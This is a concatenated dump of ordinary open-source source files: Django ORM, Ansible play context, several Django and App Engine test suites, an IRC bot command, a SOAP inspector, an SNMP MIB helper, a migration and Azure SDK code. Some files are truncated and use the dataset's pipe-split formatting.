], dtype=np.float32) / 4.0 # All of the rows are divided by 4
v_target = np.array([0.0, 1.0, 0.0])
print np.linalg.lstsq(mecanum_matrix, v_target)[0]
|
uiri/pxqz | venv/lib/python2.7/site-packages/django/db/models/query.py | Python | gpl-3.0 | 69,558 | 0.001409 | """
The main QuerySet implementation. This provides the public API for the ORM.
"""
import copy
import itertools
import sys
from django.db import connections, router, transaction, IntegrityError
from django.db.models.fields import AutoField
from django.db.models.query_utils import (Q, select_related_descend,
deferred_class_factory, InvalidQuery)
from django.db.models.deletion import Collector
from django.db.models import sql
from django.utils.functional import partition
# Used to control how many objects are worked with at once in some cases (e.g.
# when deleting objects).
CHUNK_SIZE = 100
ITER_CHUNK_SIZE = CHUNK_SIZE
# The maximum number of items to display in a QuerySet.__repr__
REPR_OUTPUT_SIZE = 20
# Pull into this namespace for backwards compatibility.
EmptyResultSet = sql.EmptyResultSet
class QuerySet(object):
"""
Represents a lazy database lookup for a set of objects.
"""
def __init__(self, model=None, query=None, using=None):
self.model = model
# EmptyQuerySet instantiates QuerySet with model as None
self._db = using
self.query = query or sql.Query(self.model)
self._result_cache = None
self._iter = None
self._sticky_filter = False
self._for_write = False
self._prefetch_related_lookups = []
self._prefetch_done = False
########################
# PYTHON MAGIC METHODS #
########################
def __deepcopy__(self, memo):
"""
Deep copy of a QuerySet doesn't populate the cache
"""
obj = self.__class__()
for k,v in self.__dict__.items():
if k in ('_iter','_result_cache'):
obj.__dict__[k] = None
else:
obj.__dict__[k] = copy.deepcopy(v, memo)
return obj
def __getstate__(self):
"""
Allows the QuerySet to be pickled.
"""
# Force the cache to be fully populated.
len(self)
obj_dict = self.__dict__.copy()
obj_dict['_iter'] = None
return obj_dict
def __repr__(self):
data = list(self[:REPR_OUTPUT_SIZE + 1])
if len(data) > REPR_OUTPUT_SIZE:
data[-1] = "...(remaining elements truncated)..."
return repr(data)
def __len__(self):
# Since __len__ is called quite frequently (for example, as part of
# list(qs), we make some effort here to be as efficient as possible
# whilst not messing up any existing iterators against the QuerySet.
if self._result_cache is None:
if self._iter:
self._result_cache = list(self._iter)
else:
self._result_cache = list(self.iterator())
elif self._iter:
self._result_cache.extend(self._iter)
if self._prefetch_related_lookups and not self._prefetch_done:
self._prefetch_related_objects()
return len(self._result_cache)
def __iter__(self):
if self._prefetch_related_lookups and not self._prefetch_done:
# We need all the results in order to be able to do the prefetch
# in one go. To minimize code duplication, we use the __len__
# code path which also forces this, and also does the prefetch
len(self)
if self._result_cache is None:
self._iter = self.iterator()
self._result_cache = []
if self._iter:
return self._result_iter()
# Python's list iterator is better than our version when we're just
# iterating over the cache.
return iter(self._result_cache)
def _result_iter(self):
pos = 0
while 1:
upper = len(self._result_cache)
while pos < upper:
yield self._result_cache[pos]
pos = pos + 1
if not self._iter:
raise StopIteration
if len(self._result_cache) <= pos:
self._fill_cache()
def __nonzero__(self):
if self._prefetch_related_lookups and not self._prefetch_done:
# We need all the results in order to be able to do the prefetch
# in one go. To minimize code duplication, we use the __len__
# code path which also forces this, and also does the prefetch
len(self)
if self._result_cache is not None:
return bool(self._result_cache)
try:
iter(self).next()
except StopIteration:
return False
return True
def __contains__(self, val):
# The 'in' operator works without this method, due to __iter__. This
# implementation exists only to shortcut the creation of Model
# instances, by bailing out early if we find a matching element.
pos = 0
if self._result_cache is not None:
if val in self._result_cache:
return True
elif self._iter is None:
# iterator is exhausted, so we have our answer
return False
# remember not to check these again:
pos = len(self._result_cache)
else:
# We need to start filling the result cache out. The following
# ensures that self._iter is not None and self._result_cache is not
# None
it = iter(self)
# Carry on, one result at a time.
while True:
if len(self._result_cache) <= pos:
self._fill_cache(num=1)
if self._iter is None:
# we ran out of items
return False
if self._result_cache[pos] == val:
return True
pos += 1
def __getitem__(self, k) | :
"""
Retrieves an item or slice from the set of results.
"""
if not isinstance(k, (slice, int, long)):
raise TypeError
assert ((not isinstance(k, slice) and (k >= 0))
or (isinstance(k, slice) and (k.start is None or k.start >= 0)
and (k.stop is None or k.stop >= 0))), \
| "Negative indexing is not supported."
if self._result_cache is not None:
if self._iter is not None:
# The result cache has only been partially populated, so we may
# need to fill it out a bit more.
if isinstance(k, slice):
if k.stop is not None:
# Some people insist on passing in strings here.
bound = int(k.stop)
else:
bound = None
else:
bound = k + 1
if len(self._result_cache) < bound:
self._fill_cache(bound - len(self._result_cache))
return self._result_cache[k]
if isinstance(k, slice):
qs = self._clone()
if k.start is not None:
start = int(k.start)
else:
start = None
if k.stop is not None:
stop = int(k.stop)
else:
stop = None
qs.query.set_limits(start, stop)
return k.step and list(qs)[::k.step] or qs
try:
qs = self._clone()
qs.query.set_limits(k, k + 1)
return list(qs)[0]
except self.model.DoesNotExist, e:
raise IndexError(e.args)
def __and__(self, other):
self._merge_sanity_check(other)
if isinstance(other, EmptyQuerySet):
return other._clone()
combined = self._clone()
combined.query.combine(other.query, sql.AND)
return combined
def __or__(self, other):
self._merge_sanity_check(other)
combined = self._clone()
if isinstance(other, EmptyQuerySet):
return combined
combined.query.combine(other.query, sql.OR)
return combined
####################################
# METHODS THAT DO DATABASE QUERIES #
####################################
def iterator(self):
"""
An iterator over the results from applying this Qu |
nlake44/UserInfuser | serverside/testing/test.py | Python | agpl-3.0 | 22,168 | 0.015292 | # Copyright (C) 2011, CloudCaptive
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
""" All paths here run unit tests
"""
import webapp2
from google.appengine.api import mail, memcache
from google.appengine.ext import db
from google.appengine.ext.db import *
from serverside import constants
from serverside.entities import memcache_db
from serverside.entities.accounts import *
from serverside.entities.badges import *
from serverside.entities.pending_create import *
from serverside.entities.users import *
from serverside.entities.widgets import *
from serverside.dao import accounts_dao
from serverside.session import Session
from serverside.tools.utils import account_login_required
from serverside import logs
from serverside.entities.logs import Logs
from serverside.testing.dummydata import *
import cgi
import logging
import os
import time
import wsgiref.handlers
import random
class TestDB(webapp2.RequestHandler):
def get(self):
self.response.out.write("Test 1:" +self.test1() +"<br>")
self.response.out.write("Test 2:" + self.test2() +"<br>")
self.response.out.write("Test 3:" + self.test3() +"<br>")
self.response.out.write("Test 4:" + self.test4() +"<br>")
""" This test creates, updates, and deletes an Account """
def test1(self):
key = "test@test.com"
ent_type = "Accounts"
trophy_case_widget = TrophyCase(key_name=key)
points_widget = Points(key_name=key)
rank_widget = Rank(key_name=key)
newacc = Accounts(key_name=key,
password="aaa",
email=key,
isEnabled="enabled",
accountType="bronze",
paymentType="free",
cookieKey="xxx",
apiKey="xxx",
trophyWidget=trophy_case_widget,
pointsWidget=points_widget,
rankWidget=rank_widget)
try:
memcache_db.delete_entity(newacc, key)
except Exception:
pass
# Save and get saved ent
ret = memcache_db.save_entity(newacc, key)
sameent = memcache_db.get_entity(key, ent_type)
if sameent.email != key:
return "Error getting same account. Subtest 1"
# purge from memcache and get from db
memcache.delete(key=key, namespace=ent_type)
sameent = memcache_db.get_entity(key, ent_type)
if sameent.email != key:
return "Error getting same account from DB (no cache). Subtest 2"
# Set and get new user name
diction = {"email":"test2@test.com"}
ret2 = memcache_db.update_fields(key, ent_type, diction)
ret2 = sameent.put()
if ret != ret2:
self.response.out.write("Error getting key name")
sameent = memcache_db.get_entity(key, ent_type)
if sameent.email != "test2@test.com":
return "Error getting same account after altering entity. Subtest 3"
try:
memcache_db.delete_entity(newacc, key)
except Exception:
return "Error deleting entity. Subtest 4"
return "Success"
""" This test creates, updates, and deletes a Badges entity"""
def test2(self):
account_key = "raj"
trophy_case_widget = TrophyCase(key_name=account_key)
points_widget = Points(key_name=account_key)
rank_widget = Rank(key_name=account_key)
newacc = Accounts(key_name=account_key,
password="aaa",
email="a@a.a",
isEnabled="enabled",
accountType="bronze",
paymentType="free",
apiKey="xxx",
cookieKey="xxx",
trophyWidget=trophy_case_widget,
pointsWidget=points_widget,
rankWidget=rank_widget)
try:
memcache_db.delete_entity(newacc, key)
except Exception:
pass
# Save and get saved ent
ret = memcache_db.save_entity(newacc, account_key)
key = "testbadge1"
ent_type = "Badges"
newacc = Badges(key_name=key,
name="badge1",
description=key,
altText="a really cool badge",
setType="free",
isEnabled="yes",
creator=newacc,
permissions="private",
blobKey="xxxx",
storageType="blob")
try:
memcache_db.delete_entity(newacc, key)
except Exception:
pass
# Save and get saved ent
ret = memcache_db.save_entity(newacc, key)
sameent = memcache_db.get_entity(key, ent_type)
if sameent.description != key:
| return "Error getting same account. Subtest 1"
# purge from memcache and get from db
memcache.delete(key=key, namespace=ent_type)
sameent = memcache_db.get_entity(key, ent_type)
if sameent.description != key:
return "Error getting same account from DB (no cache). Subtest 2"
# Set and get new user name
diction = {"isEnabled":"no", "permissions":"public"}
ret2 = memcache_db.update_fields(key, ent_type, diction)
ret2 = sameent.put()
if | ret != ret2:
self.response.out.write("Error getting key name")
sameent = memcache_db.get_entity(key, ent_type)
if sameent.isEnabled != "no" or sameent.permissions != "public":
return "Error getting same account after altering entity. Subtest 3"
try:
memcache_db.delete_entity(sameent, key)
except Exception:
return "Error deleting entity. Subtest 4"
try:
memcache_db.delete_entity(newacc, account_key)
except Exception:
return "Error deleting account. Subtest 5"
return "Success"
""" This test creates, updates, and deletes User"""
def test3(self):
account_key = "a@a.a"
trophy_case_widget = TrophyCase(key_name=account_key)
points_widget = Points(key_name=account_key)
rank_widget = Rank(key_name=account_key)
newacc = Accounts(key_name=account_key,
password="aaa",
email="a@a.a",
isEnabled="enabled",
accountType="bronze",
paymentType="free",
apiKey="xxx",
cookieKey="xxx",
trophyWidget=trophy_case_widget,
pointsWidget=points_widget,
rankWidget=rank_widget)
try:
memcache_db.delete_entity(newacc, account_key)
except Exception:
pass
# Save and get saved ent
ret = memcache_db.save_entity(newacc, account_key)
key = "testuser1"
ent_type = "Users"
newacc = Users(key_name=key,
userid=key,
isEnabled="yes",
accountRef=newacc,
tags = key)
try:
memcache_db.delete_entity(newacc, key)
except Exception:
pass
# Save and get saved ent
ret = memcache_db.save_entity(newacc, key)
sameent = memcache_db.get_entity(key, ent_type)
if sameent.tags != key:
return "Error getting same entity. Subtest 1"
# purge from memcache and get from db
memcache.delete(key=key, namespace=ent_type)
sameent = memcache_db.get_entity(key, ent_type)
if sameent.tags != key:
return "Error getting same entity from DB (no cache). Subtest 2"
# Set and get new user name
diction = {"tags":"goodbye:hello"}
ret2 = memcache_db.update_fields(key, ent_type, diction)
ret2 = sameent.put()
if ret != ret2:
self.response.out.write("Error getting key name")
sameent = memcache_db.get_entity(key, ent_type)
if sameent.tags != "goodbye:he |
richrd/bx | modules/newpass.py | Python | apache-2.0 | 939 | 0.00426 | from mod_base import*
class NewPass(Command):
"""Change your password.
Usage: newpass oldpassword newpassword newpassword
"""
def ru | n(self, win, user, data, caller=None):
args = Args(data)
if len(args) < 3:
win.Send("Usage: newpass oldpassword newpassword n | ewpassword")
return False
if not user.IsAuthed():
win.Send("you've not logged in")
return False
oldpass, pass1, pass2 = args[0:3]
if pass1 == pass2:
if self.bot.config.ChangeAccountPass(user.account["name"], oldpass, pass1):
win.Send("password changed!")
else:
win.Send("failed to change password! make sure your old password is correct.")
else:
win.Send("your new password didn't match up")
module = {
"class": NewPass,
"type": MOD_COMMAND,
"level": 0,
"zone": IRC_ZONE_QUERY,
}
|
mzizzi/ansible | lib/ansible/playbook/play_context.py | Python | gpl-3.0 | 27,386 | 0.002347 | # -*- coding: utf-8 -*-
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be u | seful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import pwd
import ra | ndom
import re
import string
import sys
from ansible import constants as C
from ansible.errors import AnsibleError
from ansible.module_utils.six import iteritems
from ansible.module_utils.six.moves import shlex_quote
from ansible.module_utils._text import to_bytes
from ansible.module_utils.parsing.convert_bool import boolean
from ansible.playbook.attribute import FieldAttribute
from ansible.playbook.base import Base
from ansible.utils.ssh_functions import check_for_controlpersist
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
__all__ = ['PlayContext']
# the magic variable mapping dictionary below is used to translate
# host/inventory variables to fields in the PlayContext
# object. The dictionary values are tuples, to account for aliases
# in variable names.
MAGIC_VARIABLE_MAPPING = dict(
connection=('ansible_connection', ),
remote_addr=('ansible_ssh_host', 'ansible_host'),
remote_user=('ansible_ssh_user', 'ansible_user'),
remote_tmp_dir=('ansible_remote_tmp', ),
port=('ansible_ssh_port', 'ansible_port'),
timeout=('ansible_ssh_timeout', 'ansible_timeout'),
ssh_executable=('ansible_ssh_executable', ),
accelerate_port=('ansible_accelerate_port', ),
password=('ansible_ssh_pass', 'ansible_password'),
private_key_file=('ansible_ssh_private_key_file', 'ansible_private_key_file'),
pipelining=('ansible_ssh_pipelining', 'ansible_pipelining'),
shell=('ansible_shell_type', ),
network_os=('ansible_network_os', ),
become=('ansible_become', ),
become_method=('ansible_become_method', ),
become_user=('ansible_become_user', ),
become_pass=('ansible_become_password', 'ansible_become_pass'),
become_exe=('ansible_become_exe', ),
become_flags=('ansible_become_flags', ),
ssh_common_args=('ansible_ssh_common_args', ),
docker_extra_args=('ansible_docker_extra_args', ),
sftp_extra_args=('ansible_sftp_extra_args', ),
scp_extra_args=('ansible_scp_extra_args', ),
ssh_extra_args=('ansible_ssh_extra_args', ),
ssh_transfer_method=('ansible_ssh_transfer_method', ),
sudo=('ansible_sudo', ),
sudo_user=('ansible_sudo_user', ),
sudo_pass=('ansible_sudo_password', 'ansible_sudo_pass'),
sudo_exe=('ansible_sudo_exe', ),
sudo_flags=('ansible_sudo_flags', ),
su=('ansible_su', ),
su_user=('ansible_su_user', ),
su_pass=('ansible_su_password', 'ansible_su_pass'),
su_exe=('ansible_su_exe', ),
su_flags=('ansible_su_flags', ),
executable=('ansible_shell_executable', ),
module_compression=('ansible_module_compression', ),
)
b_SU_PROMPT_LOCALIZATIONS = [
to_bytes('Password'),
to_bytes('암호'),
to_bytes('パスワード'),
to_bytes('Adgangskode'),
to_bytes('Contraseña'),
to_bytes('Contrasenya'),
to_bytes('Hasło'),
to_bytes('Heslo'),
to_bytes('Jelszó'),
to_bytes('Lösenord'),
to_bytes('Mật khẩu'),
to_bytes('Mot de passe'),
to_bytes('Parola'),
to_bytes('Parool'),
to_bytes('Pasahitza'),
to_bytes('Passord'),
to_bytes('Passwort'),
to_bytes('Salasana'),
to_bytes('Sandi'),
to_bytes('Senha'),
to_bytes('Wachtwoord'),
to_bytes('ססמה'),
to_bytes('Лозинка'),
to_bytes('Парола'),
to_bytes('Пароль'),
to_bytes('गुप्तशब्द'),
to_bytes('शब्दकूट'),
to_bytes('సంకేతపదము'),
to_bytes('හස්පදය'),
to_bytes('密码'),
to_bytes('密碼'),
to_bytes('口令'),
]
TASK_ATTRIBUTE_OVERRIDES = (
'become',
'become_user',
'become_pass',
'become_method',
'become_flags',
'connection',
'docker_extra_args',
'delegate_to',
'no_log',
'remote_user',
)
RESET_VARS = (
'ansible_connection',
'ansible_docker_extra_args',
'ansible_ssh_host',
'ansible_ssh_pass',
'ansible_ssh_port',
'ansible_ssh_user',
'ansible_ssh_private_key_file',
'ansible_ssh_pipelining',
'ansible_ssh_executable',
'ansible_user',
'ansible_host',
'ansible_port',
)
class PlayContext(Base):
'''
This class is used to consolidate the connection information for
hosts in a play and child tasks, where the task may override some
connection/authentication information.
'''
# connection fields, some are inherited from Base:
# (connection, port, remote_user, environment, no_log)
_docker_extra_args = FieldAttribute(isa='string')
_remote_addr = FieldAttribute(isa='string')
_remote_tmp_dir = FieldAttribute(isa='string', default=C.DEFAULT_REMOTE_TMP)
_password = FieldAttribute(isa='string')
_private_key_file = FieldAttribute(isa='string', default=C.DEFAULT_PRIVATE_KEY_FILE)
_timeout = FieldAttribute(isa='int', default=C.DEFAULT_TIMEOUT)
_shell = FieldAttribute(isa='string')
_network_os = FieldAttribute(isa='string')
_connection_user = FieldAttribute(isa='string')
_ssh_args = FieldAttribute(isa='string', default=C.ANSIBLE_SSH_ARGS)
_ssh_common_args = FieldAttribute(isa='string')
_sftp_extra_args = FieldAttribute(isa='string')
_scp_extra_args = FieldAttribute(isa='string')
_ssh_extra_args = FieldAttribute(isa='string')
_ssh_executable = FieldAttribute(isa='string', default=C.ANSIBLE_SSH_EXECUTABLE)
_ssh_transfer_method = FieldAttribute(isa='string', default=C.DEFAULT_SSH_TRANSFER_METHOD)
_connection_lockfd = FieldAttribute(isa='int')
_pipelining = FieldAttribute(isa='bool', default=C.ANSIBLE_SSH_PIPELINING)
_accelerate = FieldAttribute(isa='bool', default=False)
_accelerate_ipv6 = FieldAttribute(isa='bool', default=False, always_post_validate=True)
_accelerate_port = FieldAttribute(isa='int', default=C.ACCELERATE_PORT, always_post_validate=True)
_executable = FieldAttribute(isa='string', default=C.DEFAULT_EXECUTABLE)
_module_compression = FieldAttribute(isa='string', default=C.DEFAULT_MODULE_COMPRESSION)
# privilege escalation fields
_become = FieldAttribute(isa='bool')
_become_method = FieldAttribute(isa='string')
_become_user = FieldAttribute(isa='string')
_become_pass = FieldAttribute(isa='string')
_become_exe = FieldAttribute(isa='string')
_become_flags = FieldAttribute(isa='string')
_prompt = FieldAttribute(isa='string')
# backwards compatibility fields for sudo/su
_sudo_exe = FieldAttribute(isa='string')
_sudo_flags = FieldAttribute(isa='string')
_sudo_pass = FieldAttribute(isa='string')
_su_exe = FieldAttribute(isa='string')
_su_flags = FieldAttribute(isa='string')
_su_pass = FieldAttribute(isa='string')
# general flags
_verbosity = FieldAttribute(isa='int', default=0)
_only_tags = FieldAttribute(isa='set', default=set())
_skip_tags = FieldAttribute(isa='set', default=set())
_check_mode = FieldAttribute(isa='bool', default=False)
_force_handlers = FieldAttribute(isa='bool', default=False)
_start_at_task = FieldAttribute(isa='string')
_step = FieldAttribute(isa='bool', default=False)
_diff = FieldAttribute(isa='bool', default=C.DIFF_ALWAYS)
# Fact gathering settings
_gather_subset = FieldAttribute(isa='string', default=C.DEFAULT_GATHER_SUBSET)
_gather_timeout = FieldAttribute(isa='string', default=C.DEFAULT_GATHER_TIMEOUT)
_fact_path = Fie |
OlegKlimenko/Plamber | app/tests/test_models.py | Python | apache-2.0 | 53,921 | 0.004636 | # -*- coding: utf-8 -*-
import copy
import os
from django.contrib import auth
from django.contrib.auth.models import User
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db.models import QuerySet
from django.test import TestCase, Client, mock
from django.urls import reverse
from ..forms import AddBookForm
from ..models import (TheUser, Category, Author, Language, Book,
AddedBook, BookRating, BookComment, Post, SupportMessage, BookRelatedData)
from .utils import Utils
TEST_DIR = os.path.dirname(os.path.abspath(__file__))
TEST_DATA_DIR = os.path.join(TEST_DIR, 'fixtures')
# ----------------------------------------------------------------------------------------------------------------------
class ModelTest(TestCase):
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setUpTestData(cls):
cls.setup_users()
cls.setup_categories()
cls.setup_authors()
cls.setup_languages()
cls.setup_books()
cls.setup_added_books()
cls.setup_book_rating()
cls.setup_book_comment()
cls.setup_post_messages()
cls.setup_support_messages()
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_users(cls):
client = Client()
cls.anonymous_user = auth.get_user(client)
cls.user1 = User.objects.create_user('user1', 'user1@user1.com', 'testpassword1')
cls.user2 = User.objects.create_user('user2', 'user2@user2.com', 'testpassword2')
cls.user3 = User.objects.create_user('user3', 'user3@user3.com', 'testpassword3')
cls.user4 = User.objects.create_user('user4', 'user4@user4.com', 'testpassword4')
cls.user5 = User.objects.create_user('user5', 'user5@user5.com', 'testpassword5')
cls.user6 = User.objects.create_user('user6', 'user6@user6.com', 'testpassword6')
cls.the_user1 = TheUser.objects.get(id_user=cls.user1)
cls.the_user2 = TheUser.objects.get(id_user=cls.user2)
cls.the_user5 = TheUser.objects.get(id_user=cls.user5)
cls.the_user6 = TheUser.objects.get(id_user=cls.user6)
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_categories(cls):
cls.category1 = Category.objects.create(category_name='category1')
cls.category2 = Category.objects.create(category_name='category2')
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_authors(cls):
cls.author1 = Author.objects.create(author_name='Best Author 1')
cls.author2 = Author.objects.create(author_name='trueAuthorNew')
cls.author3 = Author.objects.create(author_name='zlast author')
cls.author4 = Author.objects.create(author_name='<AuthorSpecialSymbols>&"')
cls.author5 = Author.objects.create(author_name="O'Connor")
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_languages(cls):
cls.language_en = Language.objects.create(language='English')
cls.language_ru = Language.objects.create(language='Russian')
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_books(cls):
test_book_path = os.path.join(TEST_DATA_DIR, 'test_book.pdf')
test_book_image_path = os.path.join(TEST_DATA_DIR, 'test_book_image.png')
books_setup = [
{
'name': 'First Book',
'author': cls.author1,
'category': cls.category1,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user1,
'private': True
},
{
| 'name': 'Second Book',
'author': cls.author2,
'category': cls.category1,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
| 'who_added': cls.the_user2,
'blocked_book': True
},
{
'name': 'Third Book',
'author': cls.author2,
'category': cls.category1,
'language': cls.language_ru,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user1,
'blocked_book': True
},
{
'name': 'Fourth Book',
'author': cls.author1,
'category': cls.category1,
'language': cls.language_ru,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user2,
'blocked_book': True
},
{
'name': 'Fifth Book',
'author': cls.author1,
'category': cls.category2,
'language': cls.language_ru,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'who_added': cls.the_user1,
'private': True
},
{
'name': 'Sixth Book',
'author': cls.author2,
'category': cls.category2,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user2
},
{
'name': 'Seventh Book<>&"',
'author': cls.author4,
'category': cls.category2,
'language': cls.language_en,
'file': SimpleUploadedFile('test_book.pdf', open(test_book_path, 'rb').read()),
'photo': SimpleUploadedFile('test_book_image.png', open(test_book_image_path, 'rb').read()),
'who_added': cls.the_user2
}
]
for book in books_setup:
Book.objects.create(
book_name=book['name'],
id_author=book['author'],
id_category=book['category'],
description='TEST description',
language=book['language'],
book_file=book['file'],
photo=book.get('photo', False),
who_added=book['who_added'],
private_book=book.get('private', False),
blocked_book=book.get('blocked_book', False)
)
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_added_books(cls):
AddedBook.objects.create(id_user=cls.the_user1, id_book=Book.objects.get(book_name='Third Book'))
AddedBook.objects.create(id_user=cls.the_user1, id_book=Book.objects.get(book_name='Sixth Book'))
AddedBook.objects.create(id_user=cls.the_user1, id_book=Book.objects.get(book_name='Fourth Book'))
AddedBook.objects.create(id_user=cls.the_user2, id_book=Book.objects.get(book_name='Third Book'))
AddedBook.objects.create(id_user=cls.the_user2, id_book=Book.objects.get(book_name='Sixth Book'))
AddedBook.objects.create(id_user=cls.the_user2 |
xflows/clowdflows-backend | services/tests.py | Python | mit | 685 | 0.007299 | from pysimplesoap.client import SoapClient
def inspect(wsdl_url):
client = SoapClient(wsdl=wsdl_url,trace=False)
print("Target Namespace", client.namespace)
for service in list(client.services.values()):
for port in list(service['ports'].values()):
| print(port['location'])
for op in list(port['operations'].values()):
print('Name:', op['name'])
print('Docs:', op['documentation'].strip())
print('SOAPAction:', op['action'])
print('Input', op['input']) # args type declaration
print('Output', op['output']) # returns type declaration
| print('\n') |
UNINETT/nav | python/nav/mibs/hp_httpmanageable_mib.py | Python | gpl-2.0 | 1,236 | 0 | #
# Copyright (C) 2015 Uninett AS
#
# This file is part of Network Administration Visualized (NAV).
#
# NAV is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 3 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details. You should have received a copy of the GNU General Public License
# along with NAV. If not, see <http://www.gnu.org/licenses/>.
#
from twisted.internet import defer
from nav.smidumps import get_mib
from nav.mibs.mibretriever import MibRetriever
class HPHTTPManageableMib(MibRetriever):
"""HP-httpManageable-MIB (SEMI-MIB) MibRetriever"""
mib = get_mib('SEMI-MIB')
@defer.inlineCallbacks
def get_serial_number(self):
"""Tries to get a chassis serial number from o | ld HP switches"""
| serial = yield self.get_next('hpHttpMgSerialNumber')
if serial:
if isinstance(serial, bytes):
serial = serial.decode("utf-8")
defer.returnValue(serial)
|
GNUtn/eventoL | eventol/manager/migrations/0036_auto_20191015_2132.py | Python | gpl-3.0 | 624 | 0.001603 | # -*- coding: utf-8 -*-
# Genera | ted by Django 1.11.23 on 2019-10-15 21:32
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies | = [
('manager', '0035_auto_20191013_1705'),
]
operations = [
migrations.AlterField(
model_name='event',
name='limit_proposal_date',
field=models.DateField(default=datetime.date(2019, 10, 15), help_text='Limit date to submit talk proposals', verbose_name='Limit Proposals Date'),
preserve_default=False,
),
]
|
Azure/azure-sdk-for-python | sdk/keyvault/azure-mgmt-keyvault/azure/mgmt/keyvault/v2020_04_01_preview/operations/_private_link_resources_operations.py | Python | mit | 4,897 | 0.004288 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class PrivateLinkResourcesOperations(object):
"""PrivateLinkResourcesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.keyvault.v2020_04_01_preview.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_vault(
self,
resource_group_name, # type: str
vault_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.PrivateLinkResourceListResult"
"""Gets the private link resources supported for the key vault.
:param resource_group_name: Name of the resource group that contains the key vault.
:type resource_group_name: str
:param vault_name: The name of the key vault.
:type vault_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateLinkResourceListResult, or the result of cls(response)
:rtype: ~azure.mgmt.keyvault.v2020_04_01_preview.models.PrivateLinkResourceListResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateLinkResourceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-04-01-preview"
accept = "application/json"
# Construct URL
url = self.list_by_vault.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vaultName': self._serialize.url("vault_name", vault_name, 'str', pattern=r'^[a-zA-Z0-9-]{3,24}$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
